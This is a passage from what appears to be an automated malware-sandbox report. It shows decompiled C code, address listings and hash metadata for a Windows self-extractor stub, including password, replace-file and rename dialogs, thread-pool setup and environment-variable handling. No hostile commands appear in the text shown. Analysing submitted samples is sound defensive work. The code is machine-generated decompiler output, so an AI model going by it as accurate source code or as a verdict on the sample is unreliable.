					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00A0EF88(_t24, 0xa56a78,  &_v260);
					E00A0EFD3( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                        0x00a1ac2a
                                                        0x00a1ac2e
                                                        0x00a1ac32
                                                        0x00a1ac4b
                                                        0x00a1acba
                                                        0x00000000
                                                        0x00a1acbc
                                                        0x00a1ac4d
                                                        0x00a1ac53
                                                        0x00a1acb4
                                                        0x00000000
                                                        0x00a1acb4
                                                        0x00a1ac58
                                                        0x00a1ac67
                                                        0x00000000
                                                        0x00a1ac67
                                                        0x00a1ac5d
                                                        0x00a1ac60
                                                        0x00a1ac86
                                                        0x00a1ac98
                                                        0x00a1aca5
                                                        0x00a1acaa
                                                        0x00a1ac6d
                                                        0x00a1ac6e
                                                        0x00000000
                                                        0x00a1ac6e
                                                        0x00a1ac65
                                                        0x00a1ac6b
                                                        0x00000000
                                                        0x00a1ac6b
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                          • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        • EndDialog.USER32(?,00000001), ref: 00A1AC6E
                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A1AC86
                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A1ACB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: GETPASSWORD1
                                                        • API String ID: 445417207-3292211884
                                                        • Opcode ID: d9d19753144df9582567af856f4534006c5370b0dde6847deacc3bf4ae280f31
                                                        • Instruction ID: 27d8a1d83ee08d748bca20c83f8715d1de0e2f8792c69f47d1deb45ce0630e03
                                                        • Opcode Fuzzy Hash: d9d19753144df9582567af856f4534006c5370b0dde6847deacc3bf4ae280f31
                                                        • Instruction Fuzzy Hash: 3C11047294511877DB21DBE4AE49FFB3B7CEB6A741F000420FB89B21C0C2A19D8597E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10995 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00A10995(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xa40f50);
					E00A06E63(E00A06E68(_t19), 0xa40f50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                                                        0x00a10995
                                                        0x00a10995
                                                        0x00a1099d
                                                        0x00a109a1
                                                        0x00a109a2
                                                        0x00a109a6
                                                        0x00a109a8
                                                        0x00a109a8
                                                        0x00a109b1
                                                        0x00a109b3
                                                        0x00a109b3
                                                        0x00a109b5
                                                        0x00a109bd
                                                        0x00a109bf
                                                        0x00a109bf
                                                        0x00a109c1
                                                        0x00a109c7
                                                        0x00a109ce
                                                        0x00a109e2
                                                        0x00a109e8
                                                        0x00a109ee
                                                        0x00a109fa
                                                        0x00a10a00
                                                        0x00a10a0a
                                                        0x00a10a16
                                                        0x00a10a16
                                                        0x00a10a1c
                                                        0x00a10a24
                                                        0x00a10a2a
                                                        0x00a10a33

                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A0ADB5,00000008,?,00000000,?,00A0CD8C,?,00000000), ref: 00A109CE
                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A0ADB5,00000008,?,00000000,?,00A0CD8C,?,00000000), ref: 00A109D8
                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A0ADB5,00000008,?,00000000,?,00A0CD8C,?,00000000), ref: 00A109E8
                                                        Strings
                                                        • Thread pool initialization failed., xrefs: 00A10A00
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                        • String ID: Thread pool initialization failed.
                                                        • API String ID: 3340455307-2182114853
                                                        • Opcode ID: 75fbfc73ccf1df3ebb9ead315ac3ea2c33002dd5c44367c44faa26385976d3ea
                                                        • Instruction ID: 209fccb606101c8687b6f5793a0f7d11398880cf6cd039da5200825685eca837
                                                        • Opcode Fuzzy Hash: 75fbfc73ccf1df3ebb9ead315ac3ea2c33002dd5c44367c44faa26385976d3ea
                                                        • Instruction Fuzzy Hash: F1115EB2544708AFD3215FA5DC84AA7FBECEF95755F10482EF1DA82201D6B169C0CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D648 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1D648(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xa5dc88 = _a12;
				 *0xa5dc8c = _a16;
				 *0xa48464 = _a20;
				if( *0xa48460 == 0) {
					if( *0xa48453 == 0) {
						_t19 = E00A1BB70;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xa40ed4, _t16,  *0xa48458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xa40ed0, L"RENAMEDLG",  *0xa4844c, E00A1CF50, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}






                                                        0x00a1d655
                                                        0x00a1d65d
                                                        0x00a1d665
                                                        0x00a1d66a
                                                        0x00a1d677
                                                        0x00a1d681
                                                        0x00a1d686
                                                        0x00a1d6b0
                                                        0x00a1d6c7
                                                        0x00a1d6cc
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1d6ae
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1d6ae
                                                        0x00000000
                                                        0x00a1d6d2
                                                        0x00000000
                                                        0x00a1d67b
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                        • API String ID: 0-56093855
                                                        • Opcode ID: bcee7a302948ad5d5b4e3d775bd2e7ab04121c6e9429f5a6428ddf0b0e989c06
                                                        • Instruction ID: 4b45466eb604e3c14c74d6a4edf9413356ecd330daa2712e6a4b74f228e91bd4
                                                        • Opcode Fuzzy Hash: bcee7a302948ad5d5b4e3d775bd2e7ab04121c6e9429f5a6428ddf0b0e989c06
                                                        • Instruction Fuzzy Hash: 09018879614345BFC711CF98FD04E9A3BB9E749795F040421F619E2130D6769C91EBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D544 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 66%
                                                        			E00A1D544(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00A1E630();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E00A0FEB3(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00A0FFCC() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12);
				}
				return _t7;
			}







                                                        0x00a1d544
                                                        0x00a1d54c
                                                        0x00a1d55a
                                                        0x00a1d56f
                                                        0x00a1d574
                                                        0x00a1d578
                                                        0x00a1d57d
                                                        0x00a1d587
                                                        0x00a1d580
                                                        0x00a1d580
                                                        0x00a1d586
                                                        0x00a1d586
                                                        0x00a1d596
                                                        0x00a1d596
                                                        0x00a1d5a0

                                                        APIs
                                                        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A1D55A
                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A1D596
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentVariable
                                                        • String ID: sfxcmd$sfxpar
                                                        • API String ID: 1431749950-3493335439
                                                        • Opcode ID: 11fc0f920710520cbaf982aadbebe7f545f66973f9410f9d8a00d079053a1d49
                                                        • Instruction ID: fac600ded577def627fa2e872a887a299deb83c2557d90f77426e2a978253dcb
                                                        • Opcode Fuzzy Hash: 11fc0f920710520cbaf982aadbebe7f545f66973f9410f9d8a00d079053a1d49
                                                        • Instruction Fuzzy Hash: 4AF0EC72805238BADF205FD59C09BFA776DEF15751F000511FC48A6141D6718980D6F4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A294EE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E00A294EE(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00A240A6(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00A1E7B0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00A1E7B0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xa24d11
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00A1F5F0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00A1E7B0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00A1EAD0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00A1EAD0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00A1EAD0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00A297F1(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00A31DF0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00A28C7A();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00A28B59();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                        0x00a294ee
                                                        0x00a294f9
                                                        0x00a29500
                                                        0x00a29502
                                                        0x00a29502
                                                        0x00a29504
                                                        0x00a2950d
                                                        0x00a2950f
                                                        0x00a29514
                                                        0x00a2951a
                                                        0x00a29530
                                                        0x00a29535
                                                        0x00a29538
                                                        0x00a29545
                                                        0x00a2954a
                                                        0x00a2959e
                                                        0x00a295a6
                                                        0x00a295a8
                                                        0x00a295aa
                                                        0x00a295ad
                                                        0x00a295ad
                                                        0x00a295ad
                                                        0x00a295b3
                                                        0x00a295bb
                                                        0x00a295ce
                                                        0x00a295d1
                                                        0x00a295d3
                                                        0x00a295d6
                                                        0x00a295d7
                                                        0x00a295f8
                                                        0x00a295fb
                                                        0x00a295fb
                                                        0x00a295d9
                                                        0x00a295d9
                                                        0x00a295db
                                                        0x00a295e6
                                                        0x00a295e6
                                                        0x00a295e8
                                                        0x00a295ef
                                                        0x00a295ea
                                                        0x00a295ea
                                                        0x00a295ea
                                                        0x00a295e8
                                                        0x00a295fc
                                                        0x00a295fe
                                                        0x00a295ff
                                                        0x00a29602
                                                        0x00a29604
                                                        0x00a29618
                                                        0x00a29606
                                                        0x00a29606
                                                        0x00a29606
                                                        0x00a2961d
                                                        0x00a2961d
                                                        0x00a29622
                                                        0x00a29625
                                                        0x00a29630
                                                        0x00a29630
                                                        0x00a29630
                                                        0x00a29630
                                                        0x00a29634
                                                        0x00a2963b
                                                        0x00a2963c
                                                        0x00a2963f
                                                        0x00a29642
                                                        0x00a29642
                                                        0x00a29644
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2965c
                                                        0x00a29663
                                                        0x00a29667
                                                        0x00a2966a
                                                        0x00a2966d
                                                        0x00a2966f
                                                        0x00a2966f
                                                        0x00a2966f
                                                        0x00a29671
                                                        0x00a29674
                                                        0x00a29677
                                                        0x00a29679
                                                        0x00a29681
                                                        0x00a29687
                                                        0x00a2968a
                                                        0x00a2968d
                                                        0x00a2968e
                                                        0x00a29691
                                                        0x00a29694
                                                        0x00a29694
                                                        0x00a29699
                                                        0x00a2969c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a296b4
                                                        0x00a296b9
                                                        0x00a296bd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a296c1
                                                        0x00a296c1
                                                        0x00a296c4
                                                        0x00a296c5
                                                        0x00a296c5
                                                        0x00a296c7
                                                        0x00a296ca
                                                        0x00000000
                                                        0x00000000
                                                        0x00a296cc
                                                        0x00a296cf
                                                        0x00a296d6
                                                        0x00a296d9
                                                        0x00a296dc
                                                        0x00a296f2
                                                        0x00a296f2
                                                        0x00a296f2
                                                        0x00a296de
                                                        0x00a296de
                                                        0x00a296e0
                                                        0x00a296e3
                                                        0x00a296ee
                                                        0x00a296e5
                                                        0x00a296e8
                                                        0x00a296e8
                                                        0x00a296e3
                                                        0x00000000
                                                        0x00a296dc
                                                        0x00a296d1
                                                        0x00a296d1
                                                        0x00a296d3
                                                        0x00a296d3
                                                        0x00a29627
                                                        0x00a29627
                                                        0x00a2962a
                                                        0x00a296f5
                                                        0x00a296f5
                                                        0x00a296f7
                                                        0x00a296f9
                                                        0x00a296fc
                                                        0x00a296fd
                                                        0x00a296fe
                                                        0x00a296ff
                                                        0x00a29707
                                                        0x00a29707
                                                        0x00a29707
                                                        0x00a29709
                                                        0x00a2970c
                                                        0x00a2970f
                                                        0x00a29711
                                                        0x00a29711
                                                        0x00a29713
                                                        0x00a29725
                                                        0x00a29729
                                                        0x00a2972c
                                                        0x00a29733
                                                        0x00a2973b
                                                        0x00a2973b
                                                        0x00a2973e
                                                        0x00a29740
                                                        0x00a29751
                                                        0x00a29751
                                                        0x00a29755
                                                        0x00a29755
                                                        0x00a29758
                                                        0x00a2975a
                                                        0x00a2975d
                                                        0x00000000
                                                        0x00a29742
                                                        0x00a29742
                                                        0x00a29748
                                                        0x00a29748
                                                        0x00a2974c
                                                        0x00a2975f
                                                        0x00a2975f
                                                        0x00a29763
                                                        0x00a29764
                                                        0x00a29766
                                                        0x00a29768
                                                        0x00a297a9
                                                        0x00a297a9
                                                        0x00a297ab
                                                        0x00a297b8
                                                        0x00a297b8
                                                        0x00a297ba
                                                        0x00a297bc
                                                        0x00a297bd
                                                        0x00a297be
                                                        0x00a297c5
                                                        0x00a297c8
                                                        0x00a297ca
                                                        0x00a297ca
                                                        0x00a297cb
                                                        0x00a297cd
                                                        0x00a297d0
                                                        0x00a297d0
                                                        0x00a297d2
                                                        0x00a297d4
                                                        0x00000000
                                                        0x00a297d4
                                                        0x00a297ad
                                                        0x00a297af
                                                        0x00000000
                                                        0x00000000
                                                        0x00a297b1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a297b3
                                                        0x00a297b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a297b6
                                                        0x00a2976f
                                                        0x00a29775
                                                        0x00a29775
                                                        0x00a29777
                                                        0x00a29778
                                                        0x00a29779
                                                        0x00a2977a
                                                        0x00a29781
                                                        0x00a29784
                                                        0x00a29786
                                                        0x00a29787
                                                        0x00a29789
                                                        0x00a29796
                                                        0x00a29796
                                                        0x00a29798
                                                        0x00a2979a
                                                        0x00a2979b
                                                        0x00a2979c
                                                        0x00a297a3
                                                        0x00a297a6
                                                        0x00a297a8
                                                        0x00a297a8
                                                        0x00000000
                                                        0x00a297a8
                                                        0x00a2978b
                                                        0x00a2978b
                                                        0x00a2978d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2978f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a29791
                                                        0x00a29794
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a29794
                                                        0x00a29771
                                                        0x00a29773
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a29773
                                                        0x00a29744
                                                        0x00a29746
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a29746
                                                        0x00a29740
                                                        0x00000000
                                                        0x00a2962a
                                                        0x00a29625
                                                        0x00a2954c
                                                        0x00a2954e
                                                        0x00000000
                                                        0x00a29550
                                                        0x00a29566
                                                        0x00a2956b
                                                        0x00a2956d
                                                        0x00a29579
                                                        0x00a2957f
                                                        0x00a29580
                                                        0x00a29582
                                                        0x00a29584
                                                        0x00a2958f
                                                        0x00a2958f
                                                        0x00a29592
                                                        0x00a29594
                                                        0x00a29594
                                                        0x00a29597
                                                        0x00a2956f
                                                        0x00a2956f
                                                        0x00a2956f
                                                        0x00000000
                                                        0x00a2956d
                                                        0x00a2951c
                                                        0x00a2951c
                                                        0x00a29523
                                                        0x00a29524
                                                        0x00a29526
                                                        0x00a297d8
                                                        0x00a297dc
                                                        0x00a297e1
                                                        0x00a297e1
                                                        0x00a297f0
                                                        0x00a297f0

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
